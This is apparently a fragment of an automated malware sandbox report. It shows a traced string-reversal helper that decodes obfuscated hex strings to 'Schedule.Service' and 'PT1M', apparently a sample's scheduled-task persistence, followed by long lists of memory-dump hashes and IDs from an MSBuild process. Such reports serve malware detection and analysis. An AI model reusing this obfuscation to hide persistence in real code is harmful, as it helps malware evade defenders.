                                                                                                                                                                                        function reverseString(str) {
                                                                                                                                                                                        • reverseString("56369667275635E256C6574656863635") ➔ "5363686564756C652E53657276696365"
                                                                                                                                                                                        • reverseString("D4134505") ➔ "5054314D"
                                                                                                                                                                                        129
                                                                                                                                                                                        return str.split ( "" ).reverse ( ).join ( "" );
                                                                                                                                                                                        • "56369667275635E256C6574656863635".split("") ➔ 5,6,3,6,9,6,6,7,2,7,5,6,3,5,E,2,5,6,C,6,5,7,4,6,5,6,8,6,3,6,3,5
                                                                                                                                                                                        • 5,6,3,6,9,6,6,7,2,7,5,6,3,5,E,2,5,6,C,6,5,7,4,6,5,6,8,6,3,6,3,5.reverse() ➔ 5,3,6,3,6,8,6,5,6,4,7,5,6,C,6,5,2,E,5,3,6,5,7,2,7,6,6,9,6,3,6,5
                                                                                                                                                                                        • 5,3,6,3,6,8,6,5,6,4,7,5,6,C,6,5,2,E,5,3,6,5,7,2,7,6,6,9,6,3,6,5.join("") ➔ "5363686564756C652E53657276696365"
                                                                                                                                                                                        • "D4134505".split("") ➔ D,4,1,3,4,5,0,5
                                                                                                                                                                                        • D,4,1,3,4,5,0,5.reverse() ➔ 5,0,5,4,3,1,4,D
                                                                                                                                                                                        • 5,0,5,4,3,1,4,D.join("") ➔ "5054314D"
                                                                                                                                                                                        130
                                                                                                                                                                                        }
                                                                                                                                                                                          Reset < >
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (o_q$(o_q$,cq$,cq
                                                                                                                                                                                            • API String ID: 0-196421762
                                                                                                                                                                                            • Opcode ID: 135a4d5c198bcdc24c2d4da28e08252a76e441fde955a1fee748ea4d85c46e54
                                                                                                                                                                                            • Instruction ID: 7cd3be7bde3b82f8723d84c1eaaa6df9edd721381b6f08b9040540fa238b790b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 135a4d5c198bcdc24c2d4da28e08252a76e441fde955a1fee748ea4d85c46e54
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A1240B1A04209DFCF14CF69C994AADBBBAFF88304F5980A9E4159B2A5E730DD41CF50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (o_q$4'_q
                                                                                                                                                                                            • API String ID: 0-2938337118
                                                                                                                                                                                            • Opcode ID: 0d6e0d80387e7d6ec4785b7c86db3954c70997808a3b483ac0eb7819e9d3ffa5
                                                                                                                                                                                            • Instruction ID: 6bc894f2084edca5e7136709fa2e81064b927cb4c18fd5abbb7362ed90683c1b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d6e0d80387e7d6ec4785b7c86db3954c70997808a3b483ac0eb7819e9d3ffa5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E72A370A04609DFCB15CF68C994AAEBBF2FF88304F158599E8059B3A1D731ED85DB60
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (o_q$Hcq
                                                                                                                                                                                            • API String ID: 0-689770731
                                                                                                                                                                                            • Opcode ID: b80b78caa6724434349405f277208b0768639f79133096e376c382bc33a89214
                                                                                                                                                                                            • Instruction ID: 56e08bdec0c298a23ee466d5a80472f5d73827db4629869965a240d945dd6d90
                                                                                                                                                                                            • Opcode Fuzzy Hash: b80b78caa6724434349405f277208b0768639f79133096e376c382bc33a89214
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8112AFB0A002199FDB14DF69C954BAEBBFAFF88304F1485A9E4159B394EF349D41CB90
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: cb30de726e1e5494cd3d8cea5fc3b8b5c54808be08eca9e7f31953648f9524cc
                                                                                                                                                                                            • Instruction ID: b2363d09b48e72e0bb02d29eb0061c637c14accfdb55971b8b546c08f1d7bf57
                                                                                                                                                                                            • Opcode Fuzzy Hash: cb30de726e1e5494cd3d8cea5fc3b8b5c54808be08eca9e7f31953648f9524cc
                                                                                                                                                                                            • Instruction Fuzzy Hash: A091C274E04218DFDB18DFAAD994A9DBBF2FF88314F1481A9E419AB365DB305981CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: d1bbafe955826649e1fb8c99bec1c2a5883b9667c3a56fdc3a62f4c063388a3f
                                                                                                                                                                                            • Instruction ID: 545aa3ff041e3ff822c1a6446a7e9ccf205341cda92f45b5743ff801916722dc
                                                                                                                                                                                            • Opcode Fuzzy Hash: d1bbafe955826649e1fb8c99bec1c2a5883b9667c3a56fdc3a62f4c063388a3f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C91E574E05208CFDB18DFAAD994A9DBBF2FF89310F1494AAE419AB365DB305941CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: a66feb610fa34ad4947e662362e254afe9b3a9c02f08f1c56395cc36c589d6b9
                                                                                                                                                                                            • Instruction ID: d38329f3a441249501d78eeff526b30b4677c073dd68bf66df83b9584690b7cc
                                                                                                                                                                                            • Opcode Fuzzy Hash: a66feb610fa34ad4947e662362e254afe9b3a9c02f08f1c56395cc36c589d6b9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6281D674E05218DFDB14DFAAD994AADBBF2FF89310F1484AAE409AB365DB305941CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: c3b877f0b5ee1b7d952730ad2045eb914a0c34738885f6da9a699898edf8e596
                                                                                                                                                                                            • Instruction ID: 0df66d152e43498cb183cfe4f3e2c2355f4b776433a76340347d7d0dd763d6d0
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3b877f0b5ee1b7d952730ad2045eb914a0c34738885f6da9a699898edf8e596
                                                                                                                                                                                            • Instruction Fuzzy Hash: E681A274E052189FDB14DFAAD994A9DBBF2FF89310F14C0AAE419AB365DB305981CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: b9bbeb2965a5183155d67802ab5c0b94fa0d81f1af7031433f52020f6f92f61c
                                                                                                                                                                                            • Instruction ID: efb34f845811a90d3eebe62800b9619711731f0059d06cb704b19371f4eac1c7
                                                                                                                                                                                            • Opcode Fuzzy Hash: b9bbeb2965a5183155d67802ab5c0b94fa0d81f1af7031433f52020f6f92f61c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B81B474E05218DFDB18DFA9D994A9DBBF2FF89300F1480A9E419AB365EB705981CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: 094b9f87f3c2a72100a6ceecf425480cc1c6cbd0d2ded7f295b0b58b1810196c
                                                                                                                                                                                            • Instruction ID: 8d97594c61609b45f6306896c56433f1ed111131010684bd3ddc5311bbf00b20
                                                                                                                                                                                            • Opcode Fuzzy Hash: 094b9f87f3c2a72100a6ceecf425480cc1c6cbd0d2ded7f295b0b58b1810196c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5381C374E05218DFDB14DFAAD994A9DBBF2FF88300F1490AAE419AB364DB315981CF50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: 7f009d57d6e71eb4994f60c2b395187b47dee9d3f8a396bfb4597a352cbf4d34
                                                                                                                                                                                            • Instruction ID: c0c0b4f09f24ad114e96f819f8260bc7e8a517c786b303e24f1ff7764afb37f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f009d57d6e71eb4994f60c2b395187b47dee9d3f8a396bfb4597a352cbf4d34
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9181E674E05218DFDB18DFA9D994A9DBBF2FF89304F1480A9E419AB365DB305941CF10
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PH_q$PH_q
                                                                                                                                                                                            • API String ID: 0-3760492949
                                                                                                                                                                                            • Opcode ID: 2225b0595c89e5fdf4b9a4635993fbf185a217531da077be752e5afe150eb30e
                                                                                                                                                                                            • Instruction ID: 14db7eb7c3024f9b4e58674c7acf8acd82f2af59aded2c4fbffbac52ec8b42ad
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2225b0595c89e5fdf4b9a4635993fbf185a217531da077be752e5afe150eb30e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2981C374E05218DFDB14DFAAD994A9DBBF2FF89300F1480AAE419AB365DB305985CF10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bcd10c73b9209f03547194f83580e52a8df8955de171748be9fbb193492e62b5
                                                                                                                                                                                            • Instruction ID: dbb230accb160a63b962867a12c13fc0aa7c550b263797de1d9441760214c381
                                                                                                                                                                                            • Opcode Fuzzy Hash: bcd10c73b9209f03547194f83580e52a8df8955de171748be9fbb193492e62b5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E72DD74E052288FDB64DF29C9A0BDDBBB2BB49304F1085E9D409A7255EB30AEC1CF50
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 179d18d5406571aaa7682ef14025cf942ecaa7d6dae89b52c7ce3f539298f486
                                                                                                                                                                                            • Instruction ID: 0a367ae97aa2fd8a2849a9e216f07eb6ae554dbd574c94721c985b6f0a47dbe9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 179d18d5406571aaa7682ef14025cf942ecaa7d6dae89b52c7ce3f539298f486
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED1A174E01318CFDB14DFA5D994BADBBB2BF88304F2081A9D819AB358DB355A85CF50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                                                                                                                                                            • API String ID: 0-3630396145
                                                                                                                                                                                            • Opcode ID: d37defd84e09267fcad010cb850ee4b607df0916bc865c0558a84c20de8feffe
                                                                                                                                                                                            • Instruction ID: dfdffc91c98a89912d038a82162e753c00fb052467f6b03b19a64bbb86c789c6
                                                                                                                                                                                            • Opcode Fuzzy Hash: d37defd84e09267fcad010cb850ee4b607df0916bc865c0558a84c20de8feffe
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7226C30A082099FCB14DF68D994A9EBBF2FF89314F1585A9E815DB2A5DB31EC41CB50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xcq$Xcq$Xcq$Xcq
                                                                                                                                                                                            • API String ID: 0-2577476577
                                                                                                                                                                                            • Opcode ID: 16e23a9e20066fc68f61cc09190bc9bd0cb1008cd8da72ed3ac8169f6b5cec38
                                                                                                                                                                                            • Instruction ID: 12e9bdaae174c50eb2f87e361d84688dfb727d41c7a35c353560661ca26f029f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16e23a9e20066fc68f61cc09190bc9bd0cb1008cd8da72ed3ac8169f6b5cec38
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0322D6D6E067810BC3450EB441EA6AEBFE3DFA9231BA5C288C8C05B75AE53DDD478741
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 4'_q$4'_q$;_q
                                                                                                                                                                                            • API String ID: 0-3167732188
                                                                                                                                                                                            • Opcode ID: 156afc0f6fcc331205582c1affb7421c7f227050e9b0897b7a06036b7b14bee7
                                                                                                                                                                                            • Instruction ID: d5869635a59fc03d50f09313afe01f40f0a4e487d64c1582044e7e39c0da4b95
                                                                                                                                                                                            • Opcode Fuzzy Hash: 156afc0f6fcc331205582c1affb7421c7f227050e9b0897b7a06036b7b14bee7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F1AF703192018FDB199A39C978B3977AAEF85704F1944EAE516CFBA1EF29CC81C741
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: $_q$$_q
                                                                                                                                                                                            • API String ID: 0-458585787
                                                                                                                                                                                            • Opcode ID: 74e86f0211d419199c5faea71161d9020edc95355124c7b9496455c708e1329f
                                                                                                                                                                                            • Instruction ID: 5fc355525355591c4042f22ce3b484baf6f856d3d0d037e8c035ced3f699da1d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 74e86f0211d419199c5faea71161d9020edc95355124c7b9496455c708e1329f
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1522B74A00219DFEB15EBA4C960BAEBB73EF84300F1080A9D50AAB7A4DF345E45DF55
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Hcq$Hcq
                                                                                                                                                                                            • API String ID: 0-4088181183
                                                                                                                                                                                            • Opcode ID: ede4aa709308a519b1321f58c75bcd38119114c53c22b189a33752654f17cf0b
                                                                                                                                                                                            • Instruction ID: 56c0a77e825825d7a1d0992f3b32684599812a409c310776b14774e156142fe6
                                                                                                                                                                                            • Opcode Fuzzy Hash: ede4aa709308a519b1321f58c75bcd38119114c53c22b189a33752654f17cf0b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 90B1C131B082159FDB259F38C9A4B6E7BA2EF88314F5488A9E406CB390DF34D945CB90
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,cq$,cq
                                                                                                                                                                                            • API String ID: 0-2927840315
                                                                                                                                                                                            • Opcode ID: ff4a3343ce425a8a88bc2ff2db505e7dd7526ad15c43dbf7f350101a8d68ffb2
                                                                                                                                                                                            • Instruction ID: f57c1c20f06a9de09d69365b43e1e1eb9c44d58064a1aa8cd851c6cf6322978d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff4a3343ce425a8a88bc2ff2db505e7dd7526ad15c43dbf7f350101a8d68ffb2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9681BF35E08105DFCB24CF68C8A8AAEB7B2FF89314B9481A9D405DB364DB31EA41CB50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xcq$Xcq
                                                                                                                                                                                            • API String ID: 0-1149048318
                                                                                                                                                                                            • Opcode ID: dee01eccaa0ca1cc9a5f7b7487bbd13df0a5243fe5251eb9567640c7bc32b9b3
                                                                                                                                                                                            • Instruction ID: 2abd3e6fd94ae1a9a3cc71cbc399aefc5ff9f4cc6e378898c608b9fd51813082
                                                                                                                                                                                            • Opcode Fuzzy Hash: dee01eccaa0ca1cc9a5f7b7487bbd13df0a5243fe5251eb9567640c7bc32b9b3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0831F375B083258BDF1D896A9AA437EB9DAFBC4214F1C44F9E806C7380DF74CC4586A1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LR_q
                                                                                                                                                                                            • API String ID: 0-2241839734
                                                                                                                                                                                            • Opcode ID: 5ebbcd97c9316372f5ad77e331e1c3756a6bf8378c9567259ade4ac523da6778
                                                                                                                                                                                            • Instruction ID: e7454323b2bdc0e201020e236960d2616b1e1244a85c86f3fe187eb9b2d3f362
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ebbcd97c9316372f5ad77e331e1c3756a6bf8378c9567259ade4ac523da6778
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C22ED7890021ACFCB54EF64EA95B9DBBB1FF48304F1095A5E809AB758DB306E85CF44
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LR_q
                                                                                                                                                                                            • API String ID: 0-2241839734
                                                                                                                                                                                            • Opcode ID: 323ba6be8ac21a6033401d55792a06adddf5cb3cd6d6d920969b408975288f13
                                                                                                                                                                                            • Instruction ID: 20162372723f689ebd34fe88074158b8bb76414ff3a6c71521626b42944e5db3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 323ba6be8ac21a6033401d55792a06adddf5cb3cd6d6d920969b408975288f13
                                                                                                                                                                                            • Instruction Fuzzy Hash: D222ED78900219CFCB54EF64EA95B9DBBB1FF48304F1095A5E809AB758DB306E85CF44
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (o_q
                                                                                                                                                                                            • API String ID: 0-493409505
                                                                                                                                                                                            • Opcode ID: aceba7424dd3d8b07e9ca453b7b6f44965cc09193e16f72ddef55eebdbb22574
                                                                                                                                                                                            • Instruction ID: e9be10869a7e8a72e0b089be83bc7689ad47a7efc7b9ce31c6b9bfa2cf238a2b
                                                                                                                                                                                            • Opcode Fuzzy Hash: aceba7424dd3d8b07e9ca453b7b6f44965cc09193e16f72ddef55eebdbb22574
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3641C1357042048FDB059B78DA656AE7FF6AFC8211F1444A9E916D7391DE309C06CBA4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 077b58206ec10405bf02400913c3ba4691b5a729f48d0bde41abe40e05a4f12d
                                                                                                                                                                                            • Instruction ID: b3be3a66949d38c931658d7960077e292fd3b8d57c423b56b8dfe182229f9621
                                                                                                                                                                                            • Opcode Fuzzy Hash: 077b58206ec10405bf02400913c3ba4691b5a729f48d0bde41abe40e05a4f12d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 04F14E71A05215CFCB04CF6CC994AADBBF2FF88314B1A8199E515AB365DB35EC81CB60
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 95724e270a643c181817adf49bf8724cc624e38a7e0815e032247864308f462a
                                                                                                                                                                                            • Instruction ID: 8c480c17ab71a01547753bf7fa1b2f155156a79710bbc74a8fb59476f8094dac
                                                                                                                                                                                            • Opcode Fuzzy Hash: 95724e270a643c181817adf49bf8724cc624e38a7e0815e032247864308f462a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6271D5347086058FDB15DF2DC4A8AADBBE6EF89604B1940E9E916CB3A1DF70DC41DB90
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: be4dddf491182315008c80b88b0688438de80b6ce26ade195af3b8620a04ffa8
                                                                                                                                                                                            • Instruction ID: 0da450a186e237d1e8e338c395bd39a2c434716b3ce2ec1990d5d1a6f9f4cb33
                                                                                                                                                                                            • Opcode Fuzzy Hash: be4dddf491182315008c80b88b0688438de80b6ce26ade195af3b8620a04ffa8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4551C0704793128FE3042B20B2AE53EBFA5FB5F3137926C84F01E99895DF746494CA19
                                                                                                                                                                                            Memory Dump Source
